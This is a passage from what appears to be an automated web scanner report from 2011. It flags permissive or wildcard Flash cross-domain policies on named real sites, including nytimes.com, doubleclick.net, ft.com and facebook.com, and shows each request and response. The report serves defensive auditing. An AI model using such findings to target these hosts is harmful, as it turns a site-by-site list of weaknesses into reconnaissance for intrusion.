Date: Thu, 12 May 2011 11:03:16 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.12. http://secure-us.imrworldwide.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:04:08 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Thu, 19 May 2011 11:04:08 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

5.13. http://wt.o.nytimes.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wt.o.nytimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: wt.o.nytimes.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:82c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:04:37 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

5.14. http://add.my.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://add.my.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: add.my.yahoo.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 10:57:50 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

5.15. http://dealbook.nytimes.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: dealbook.nytimes.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:54 GMT
Server: Apache
Last-Modified: Wed, 11 May 2011 17:05:31 GMT
ETag: "100a4d-169-4a303147fecc0"
Accept-Ranges: bytes
Content-Length: 361
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.*.nytimes.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.nytvideo.feedroom.com" />
   <allow-access-from domain="*.www.feedroom.com" />
   <allow-access-from domain="*.chumby.com" />
   <allow-access-from domain="*.createthe.com" />
...[SNIP]...

5.16. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Thu, 12 May 2011 10:43:52 GMT
Expires: Fri, 13 May 2011 10:43:52 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 1120

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

5.17. http://graphics8.nytimes.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://graphics8.nytimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: graphics8.nytimes.com

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 1169
Content-Type: text/xml
Last-Modified: Wed, 21 Jul 2010 15:01:34 GMT
ETag: "491-4c470bce"
Cache-Control: private, max-age=63703
Date: Thu, 12 May 2011 11:02:58 GMT
Content-Length: 1169
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.*.nytimes.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.nytvideo.feedroom.com" />
   <allow-access-from domain="*.www.feedroom.com" />
   <allow-access-from domain="*.chumby.com" />
   <allow-access-from domain="*.createthe.com" />
   <allow-access-from domain="*.predictify.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.*.brightcove.com" />
   <allow-access-from domain="*.nytsyndicate.com"/>
   <allow-access-from domain="*.*.nytsyndicate.com"/>
   <allow-access-from domain="xdce.adobe.com" />
   <allow-access-from domain="www.rokkandev.com" />
   <allow-access-from domain="cdn.eyewonder.com" />
   <allow-access-from domain="apps.eyewonderlabs.com" />
   <allow-access-from domain="media.pointroll.com" />
   <allow-access-from domain="speed.pointroll.com" />
<allow-access-from domain="u-sta.unicast.com"/>
<allow-access-from domain="creativeby1.unicast.com"/>
<allow-access-from domain="creativeby2.unicast.com"/>
<allow-access-from domain="picklegroup.com"/>
...[SNIP]...

5.18. http://markets.on.nytimes.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://markets.on.nytimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: markets.on.nytimes.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 11:03:52 GMT
Content-Length: 420
Content-Type: text/xml
Last-Modified: Mon, 14 Jul 2008 23:38:14 GMT
Accept-Ranges: bytes
ETag: "b87378afae6c81:3916"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.*.nytimes.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.nytvideo.feedroom.com" />
   <allow-access-from domain="*.www.feedroom.com" />
   <allow-access-from domain="*.chumby.com" />
   <allow-access-from domain="*.createthe.com" />
   <allow-access-from domain="*.predictify.com" />
...[SNIP]...

5.19. http://media.ft.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://media.ft.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.ft.com

Response

HTTP/1.1 200 OK
Content-Length: 1309
Content-Type: text/xml
ETag: "51d-4ba8ec18"
Last-Modified: Tue, 23 Mar 2010 16:28:08 GMT
Accept-Ranges: bytes
Server: Apache/1.3.37
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Date: Thu, 12 May 2011 11:03:18 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ft.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.tangozebra.com" secure="true"/>
<allow-access-from domain="*.euronews.net" secure="true"/>
<allow-access-from domain="*.google.com" secure="true"/>
<allow-access-from domain="*.gstatic.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="false"/>
<allow-access-from domain="*.dartmotif.net" secure="false"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.googlesyndication.com" secure="true"/>
<allow-access-from domain="*.brightcove.com" secure="true"/>
<allow-access-from domain="*.google-analytics.com" secure="true"/>
...[SNIP]...

5.20. http://pagead2.googlesyndication.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Wed, 11 May 2011 19:28:23 GMT
Expires: Thu, 12 May 2011 19:28:23 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 55985

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

5.21. http://pubads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Thu, 12 May 2011 03:46:12 GMT
Expires: Fri, 13 May 2011 03:46:12 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 26114
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

5.22. http://timespeople.nytimes.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://timespeople.nytimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: timespeople.nytimes.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:03:16 GMT
Content-length: 464
Content-type: text/xml
Last-modified: Wed, 10 Mar 2010 02:18:30 GMT
Accept-ranges: bytes
Connection: keep-alive

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.*.nytimes.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.nytvideo.feedroom.com" />
   <allow-access-from domain="*.www.feedroom.com" />
   <allow-access-from domain="*.chumby.com" />
   <allow-access-from domain="*.*.tremormedia.com" />
   <allow-access-from domain="*.tremormedia.com" />
   <allow-access-from domain="*.brightcove.com" />
...[SNIP]...

5.23. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.204.51
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

5.24. http://www.ft.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ft.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interacti